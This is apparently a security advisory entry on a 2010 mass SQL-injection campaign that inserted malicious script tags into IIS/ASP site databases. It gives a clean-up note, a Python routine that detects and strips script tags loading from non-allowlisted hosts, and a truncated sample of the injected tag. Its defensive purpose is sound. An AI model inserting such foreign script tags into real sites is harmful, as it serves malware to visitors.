Description: Malicious JavaScript added to IIS sites via SQL injection.
Domains used:
And many others.
Details:
http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-2677-inyahoo-js.html
http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html
Affecting: Any IIS/ASP site.
Clean up: Revert back to your latest database backup or clean up each entry from their.
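One way to do the per-entry clean-up when no backup is available, as an added example that is not part of the original entry: it scans a text column for script tags that load from a host outside an allowlist, reports them, and strips them. The allowlist, the table and column names, and the sample rows are constructed, and sqlite3 stands in for the site's database so the example runs offline.

```python
import re
import sqlite3
from urllib.parse import urlparse

ALLOWED_HOSTS = {"www.example.org"}  # assumption: hosts the site really loads scripts from

# A <script src="http://..."> tag, quoted or not, with or without its closing tag.
SCRIPT_RE = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']?(https?://[^"\'\s>]+)["\']?[^>]*>'
    r'(?:\s*</script\s*>)?', re.IGNORECASE)

def strip_foreign_scripts(value, allowed=ALLOWED_HOSTS):
    """Return (cleaned_value, removed_urls) for one text field."""
    removed = []
    def repl(match):
        host = (urlparse(match.group(1)).hostname or "").lower()
        if host in allowed:
            return match.group(0)      # legitimate script, keep it
        removed.append(match.group(1))
        return ""                      # injected tag, drop it
    return SCRIPT_RE.sub(repl, value), removed

def clean_table(conn, table, key, column, dry_run=True):
    """Scan table.column; return [(key, removed_urls)]. Rows change only if dry_run is False."""
    # table/key/column are operator-supplied identifiers, never user input.
    findings = []
    rows = conn.execute(f'SELECT "{key}", "{column}" FROM "{table}"').fetchall()
    for row_id, value in rows:
        if not isinstance(value, str):
            continue
        cleaned, removed = strip_foreign_scripts(value)
        if removed:
            findings.append((row_id, removed))
            if not dry_run:
                conn.execute(f'UPDATE "{table}" SET "{column}" = ? WHERE "{key}" = ?',
                             (cleaned, row_id))
    if not dry_run:
        conn.commit()
    return findings

def demo():
    """Constructed rows: clean, injected, and one with an allowed script."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)", [
        (1, "Quarterly report"),
        (2, 'Contact us<script src="http://injected.example/ur.php"></script>'),
        (3, 'Home<script src="http://www.example.org/site.js"></script>')])
    findings = clean_table(conn, "articles", "id", "title", dry_run=False)
    return findings, dict(conn.execute("SELECT id, title FROM articles"))
```

Run it with `dry_run=True` first and review the findings before letting it update rows; the injection point that allowed the writes still has to be fixed or the entries will be reinfected.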
Malware dump:
<script src="http://alisa-carter.com/ur.ph..